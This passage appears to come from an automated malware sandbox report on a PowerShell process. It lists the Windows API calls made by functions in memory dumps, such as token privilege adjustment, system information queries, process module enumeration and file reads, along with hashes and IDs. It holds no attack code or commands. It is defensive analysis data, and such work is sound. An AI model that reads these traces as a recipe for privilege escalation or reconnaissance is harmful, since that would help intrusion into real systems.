                                                                                            • Opcode Fuzzy Hash: 11c7749fea046450e99cd3c37502e8e8ee3b2778dbcb0bb9ac7b045b0b673433
                                                                                            • Instruction Fuzzy Hash: AFD05E343016818FEB16CA1CD198F5977E8AF44700F0644ECBC008B6A6C3B5E880C600
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: powershell.exe PID: 2260 Parent PID: 1696 powershell.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 01CFACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CFAD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: f489ebde511d212dec5ac97c99c4c1f595d310b31de095b3a69dcabbdeefab62
                                                                                            • Instruction ID: 6c96e7774410a46405f3e31223831dab35a77e82ce35a2f6cbf01eabb63d5b4a
                                                                                            • Opcode Fuzzy Hash: f489ebde511d212dec5ac97c99c4c1f595d310b31de095b3a69dcabbdeefab62
                                                                                            • Instruction Fuzzy Hash: E62191755097849FEB238F25DC44B92FFB4EF06310F0885DAE9898B5A3D271D908DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CFAD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: a95f9b3c569fcd10edece8c76ddc7e8cc51f58d2ce7b9e430764e0b72d2c21fc
                                                                                            • Instruction ID: ff116e569f2b67aded8f9f2423783216adaf9f5007c59ca288aa8c5ae0301624
                                                                                            • Opcode Fuzzy Hash: a95f9b3c569fcd10edece8c76ddc7e8cc51f58d2ce7b9e430764e0b72d2c21fc
                                                                                            • Instruction Fuzzy Hash: 8F114876500704DFEB618F55DC84BA6FBE4EF04321F0884AAEE498B662D331E514DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CFB329
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 81c45d9293fb501d21cc6cc728a978929170c43337101753db67d9d6b9bef773
                                                                                            • Instruction ID: 023376f25e4b1792a423d8ee689ff6131216970f8da3cb90bc4b2be9958fb853
                                                                                            • Opcode Fuzzy Hash: 81c45d9293fb501d21cc6cc728a978929170c43337101753db67d9d6b9bef773
                                                                                            • Instruction Fuzzy Hash: 5011A071508380EFDB228F15DC45F62FFB4EF06220F09849EEE844B663C275A918DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CFB329
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 02879daf93f805fd8af6971acdbb197db411c27ea45b6bc9e872e56902d521f3
                                                                                            • Instruction ID: c1d61a037b2573b15b97962db5cc5f30d788c9ded8c6ff330705f44836c64d2d
                                                                                            • Opcode Fuzzy Hash: 02879daf93f805fd8af6971acdbb197db411c27ea45b6bc9e872e56902d521f3
                                                                                            • Instruction Fuzzy Hash: 3D01AD35400700DFEB618F09DC85B25FBA0EF04B20F08C09EDE890B612C771E918DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: f6d81c15dc07c4d29d4f7b5e3de3740292b61acc2f23ba1a98216c406f2f0252
                                                                                            • Instruction ID: 5f420843a7ce63f2a3a748f942b683c19013b529cf2ceacc23acc03cc0f0a686
                                                                                            • Opcode Fuzzy Hash: f6d81c15dc07c4d29d4f7b5e3de3740292b61acc2f23ba1a98216c406f2f0252
                                                                                            • Instruction Fuzzy Hash: 55314A7650E3C09FEB138B759C65692BFB4AF03210F0E84DBD884CF1A3D6659809DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: a8d4be391ea3dfdfbc62a5be48743ed207979cb0b07d3550449d8e807aeeb971
                                                                                            • Instruction ID: e3e65d421bd47362350b4f551b53372e7b717a3ee697103a63f847bb10d8f305
                                                                                            • Opcode Fuzzy Hash: a8d4be391ea3dfdfbc62a5be48743ed207979cb0b07d3550449d8e807aeeb971
                                                                                            • Instruction Fuzzy Hash: 5E316375509380AFEB22CF65CC85F56BFF8EF05210F09849EE9859B292D375E908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 309d97b8819e51ef3508a406ec3a963651e15472e63e5b01da5e8731c49c200f
                                                                                            • Instruction ID: 9018675ef624e68abd287870c4870dcf8b4d4822386e238a206bfd5ba24f75d8
                                                                                            • Opcode Fuzzy Hash: 309d97b8819e51ef3508a406ec3a963651e15472e63e5b01da5e8731c49c200f
                                                                                            • Instruction Fuzzy Hash: 913195B1509380AFE722CB25DC45B96BFE8DF06254F0884AAE984CF293D375A905CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFBD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F85E5183,00000000,00000000,00000000,00000000), ref: 01CFBDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: e8b175f7fe6c00ad042acd798ab0b9f4acb38bc275bd3077891ca01e1fde8cc8
                                                                                            • Instruction ID: 98e34f7f975c51ea8fe2b0d30f48d84783fe93e96edc398e09c9629c6c29a978
                                                                                            • Opcode Fuzzy Hash: e8b175f7fe6c00ad042acd798ab0b9f4acb38bc275bd3077891ca01e1fde8cc8
                                                                                            • Instruction Fuzzy Hash: 70319372509380AFE722CB61DC55F96BFB8EF06210F0885DBF985DB193D225A909C7B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F85E5183,00000000,00000000,00000000,00000000), ref: 01CFAFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 98c262ed1dc6ddc3acfc994759093110794e7eab407e702c00511a3938e425d6
                                                                                            • Instruction ID: 4fd87275936aad06ef3bef5357b44111604f14a32518b73d92c3b679529255f9
                                                                                            • Opcode Fuzzy Hash: 98c262ed1dc6ddc3acfc994759093110794e7eab407e702c00511a3938e425d6
                                                                                            • Instruction Fuzzy Hash: BD21B6B2509380AFE712CF64DC45B96BFB8EF06320F0885DBE984DB193D2659945C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 80e58f3c4ee94adbef4e41a7206cb548bf6b1ab35e3dfcc7cb5ade9ee9ca1e27
                                                                                            • Instruction ID: b831740cc50b2aeb60dd9e29b2ded6f34763a74ee34c9a6286c54b275a773d7f
                                                                                            • Opcode Fuzzy Hash: 80e58f3c4ee94adbef4e41a7206cb548bf6b1ab35e3dfcc7cb5ade9ee9ca1e27
                                                                                            • Instruction Fuzzy Hash: 2731617550E3C06FD3138B358C55B55BFB4AF43610F1A81DBD8848F1A3D629A909C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F85E5183,00000000,00000000,00000000,00000000), ref: 01CFB0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: d67bf4dcba1787d6d360ecbcb24a7fa9f40ec242d2dc648c6f620afb11fbd615
                                                                                            • Instruction ID: 05979efabdaa50031f0a30ae63960c27c8307245925c3c533e29bc48d155cdb7
                                                                                            • Opcode Fuzzy Hash: d67bf4dcba1787d6d360ecbcb24a7fa9f40ec242d2dc648c6f620afb11fbd615
                                                                                            • Instruction Fuzzy Hash: BD2191B1509380EFE722CB15DC45FA6BFA8EF06220F0884AAE945DB152D764E948CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFA1A8, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01CFA23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: 8bc2d4908fce9a6f8624c2f9b0f171505e00096edad96d9b24ee3f6bcbee84b3
                                                                                            • Instruction ID: 194ea665001c679bab9bd40c167ad59a351d504ffa538e3967e692bff115b2ee
                                                                                            • Opcode Fuzzy Hash: 8bc2d4908fce9a6f8624c2f9b0f171505e00096edad96d9b24ee3f6bcbee84b3
                                                                                            • Instruction Fuzzy Hash: 1321A77550D3C0AFD312CB258C55B66BFB4EF47620F1981DBE8848F193D229A919C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F85E5183,00000000,00000000,00000000,00000000), ref: 02770819
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: b9ec1c1f6034496c87e4e0991de4f466af7a757f8150254bc8e7ab6d6067d599
                                                                                            • Instruction ID: 4ed862be1b7eb4e6583cc1517ed35d3760dec6d63ad0d20624e432f89ccdc9fc
                                                                                            • Opcode Fuzzy Hash: b9ec1c1f6034496c87e4e0991de4f466af7a757f8150254bc8e7ab6d6067d599
                                                                                            • Instruction Fuzzy Hash: 3921DAB6408780AFE712CB159C45FA3BFA8EF46720F1981DBF9848B193D224A905C7B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: f904eeb259a756f73476bf5fdbb881cbe1de8ec555398948e84f750a0a32635a
                                                                                            • Instruction ID: c6716f9b0d8a44fa63bff49174975ec3973f61af9f4eb7263223ac41e9f3f0a7
                                                                                            • Opcode Fuzzy Hash: f904eeb259a756f73476bf5fdbb881cbe1de8ec555398948e84f750a0a32635a
                                                                                            • Instruction Fuzzy Hash: 30217F7540E3C0AFD3128B358C55B66BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027706AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 903a428e6d5459ab997e96aab981033ddaddfa9d7a4ec4dd73948b6f7721d5a8
                                                                                            • Instruction ID: c6c3726558c0c61701824f0e02c79fe7597d4d92c300913c08b5a530434160d5
                                                                                            • Opcode Fuzzy Hash: 903a428e6d5459ab997e96aab981033ddaddfa9d7a4ec4dd73948b6f7721d5a8
                                                                                            • Instruction Fuzzy Hash: E2219D71500704EFEB21DF65CC85F66FBE8EF08650F04846AE9899B292D771E904CFA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F85E5183,00000000,00000000,00000000,00000000), ref: 027708E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 177051af8b06115dabb321c12280979e8848fca5ac63660474c84af3f28747a5
                                                                                            • Instruction ID: 3c15ccf2e4b269b7782c63e37b6b4be0c1a3c7e8490d592c57c82d72efff857b
                                                                                            • Opcode Fuzzy Hash: 177051af8b06115dabb321c12280979e8848fca5ac63660474c84af3f28747a5
                                                                                            • Instruction Fuzzy Hash: 80216271409380AFEB22CF61DC45F56BFB8EF46314F0985DBE9849B153C265A909CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CFA94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 529ea8ca58a1c089ed590691c6bd585974853c564eed1d4d68aeb68ce3588fb5
                                                                                            • Instruction ID: b9c0281ff2545e7c6e5416252e8555dca797754b1e13c83bdb0ac8d15e4038fc
                                                                                            • Opcode Fuzzy Hash: 529ea8ca58a1c089ed590691c6bd585974853c564eed1d4d68aeb68ce3588fb5
                                                                                            • Instruction Fuzzy Hash: 0A21A77540D780AFD3138B25DC51B62BFB4EF87710F1981DBE8848B653D224A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: d276f37aece03dd12f9cd0dadaf877912d17e30b49c9cd9e5d64453474ac9fd8
                                                                                            • Instruction ID: 14ad4c1a742cc6d52a1313276863d3841908306441b9d5f4963a53e64743cb0c
                                                                                            • Opcode Fuzzy Hash: d276f37aece03dd12f9cd0dadaf877912d17e30b49c9cd9e5d64453474ac9fd8
                                                                                            • Instruction Fuzzy Hash: 3421AE71600300AFFB20DF25CC85BA6FBD8EF04250F0484AAE848DB282D775F804CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFBD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F85E5183,00000000,00000000,00000000,00000000), ref: 01CFBDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: d9b7464ef5dc6feddbeaa2af598ed5f1cb8ab79cdc1691651d20742a02c28ca8
                                                                                            • Instruction ID: c1f73b261906ab6fb3bc861ca756eb815fc357b158f04c5f704267c01038b46c
                                                                                            • Opcode Fuzzy Hash: d9b7464ef5dc6feddbeaa2af598ed5f1cb8ab79cdc1691651d20742a02c28ca8
                                                                                            • Instruction Fuzzy Hash: 65119D72500304EFEB21CF55DC85FAAFBA8EF04360F14856AFA459A281D670E9048BB2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: d0abfc094c091fd52830830945ec679609a6822bc8d835d3fed32e1ecce4dd35
                                                                                            • Instruction ID: ed51ae3e81cc4654c15baa6877f1345347c59e488d0302f2468d2c7a51c12575
                                                                                            • Opcode Fuzzy Hash: d0abfc094c091fd52830830945ec679609a6822bc8d835d3fed32e1ecce4dd35
                                                                                            • Instruction Fuzzy Hash: 48219F725083809FEB21CF25DC45B96FFB4EF06220F0884EAED898B562D335A449DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 0c8240ea0e08050739106542108f30000a1d7bc556326c4260398c104a9e701c
                                                                                            • Instruction ID: b7cc8099a964d885926410914417b8d76ce2b8e9af72438530b9bfbf1e4d6a0d
                                                                                            • Opcode Fuzzy Hash: 0c8240ea0e08050739106542108f30000a1d7bc556326c4260398c104a9e701c
                                                                                            • Instruction Fuzzy Hash: 40216D7150D3C09FDB12CB25DC55B92BFB4AF03224F0D84DAE888CF293D2659808CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F85E5183,00000000,00000000,00000000,00000000), ref: 01CFB0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: bad5c38a46792f4282f9d3c180483493aa10f83dea2466504e0abbd2d034a218
                                                                                            • Instruction ID: 1ac6090551d5ddcd8232c79a3c85c4f63d28b508955ab047e8c8c66a3803e523
                                                                                            • Opcode Fuzzy Hash: bad5c38a46792f4282f9d3c180483493aa10f83dea2466504e0abbd2d034a218
                                                                                            • Instruction Fuzzy Hash: F61181B1600300EFEB21CF15DC85FAAFBA8EF04660F14846AEE05CB641D774E9048BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CFAB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 127a9c4368c48af73182951128e6df0d5cb9dc12e8071cdf03da5ed86afd6056
                                                                                            • Instruction ID: 3c85476ffe46b36836e852e9a70e0046625327610e7f91e5a21905d048fa3bf9
                                                                                            • Opcode Fuzzy Hash: 127a9c4368c48af73182951128e6df0d5cb9dc12e8071cdf03da5ed86afd6056
                                                                                            • Instruction Fuzzy Hash: E22172716093849FEB22CF29DC45B52FFA8EF46210F0884AEED49CB652D265E508CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFBABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 01CFBB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: bc1a5ebf8045fefe1962bc4f8062a1a2564f70a231ab9ad4491b21b977294efb
                                                                                            • Instruction ID: d9988bff25cba460ee1c69b12fba1fb401b328f5e7a0c4188516745a297b0538
                                                                                            • Opcode Fuzzy Hash: bc1a5ebf8045fefe1962bc4f8062a1a2564f70a231ab9ad4491b21b977294efb
                                                                                            • Instruction Fuzzy Hash: 7021A1725093C49FEB128B25DC55B92BFB4EF07220F0D84DBED858F263D224A908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027710D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: f9dfdcb3a37861fb69595da85ab671be7740169e3be04a8574e6b4c6526d0e78
                                                                                            • Instruction ID: e003318bd917e15e761cdf306bc00ad61c6d980d0ebdb90f620b8fa93ba8c188
                                                                                            • Opcode Fuzzy Hash: f9dfdcb3a37861fb69595da85ab671be7740169e3be04a8574e6b4c6526d0e78
                                                                                            • Instruction Fuzzy Hash: FC216D6140D3C4AFD7138B25DC64A62BFB4EF57620F0D80DBD8848F2A3D2695808D7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F85E5183,00000000,00000000,00000000,00000000), ref: 01CFAFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126219056.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 4309eba2bd4ced34cf6d0fa79105fdaac546b0253435f42960cd501ad2ff1354
                                                                                            • Instruction ID: 56f9acccf18f5dd2efd3c339e72927ac510016f2a14087530ca1396731332331
                                                                                            • Opcode Fuzzy Hash: 4309eba2bd4ced34cf6d0fa79105fdaac546b0253435f42960cd501ad2ff1354
                                                                                            • Instruction Fuzzy Hash: F411C472500300EFEB21DF55DC45BAAFBA8EF44760F14846AFE498B181D770E9048BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F85E5183,00000000,00000000,00000000,00000000), ref: 027708E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133334119.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 482f60418efe5142466fdc591dfc913d145c78dd4f11ec756aba6fe7462c65c4
                                                                                            • Instruction ID: 60fc0203edba673f4d3d803917cfd5c9fbe918151b0019782c7d4d286c23dbc4
                                                                                            • Opcode Fuzzy Hash: 482f60418efe5142466fdc591dfc913d145c78dd4f11ec756aba6fe7462c65c4
                                                                                            • Instruction Fuzzy Hash: E411CE72400300EFFB21CF51DC85FAAFBA8EF14720F1485AAED499A241C671A904CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CFBA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CFBA7E
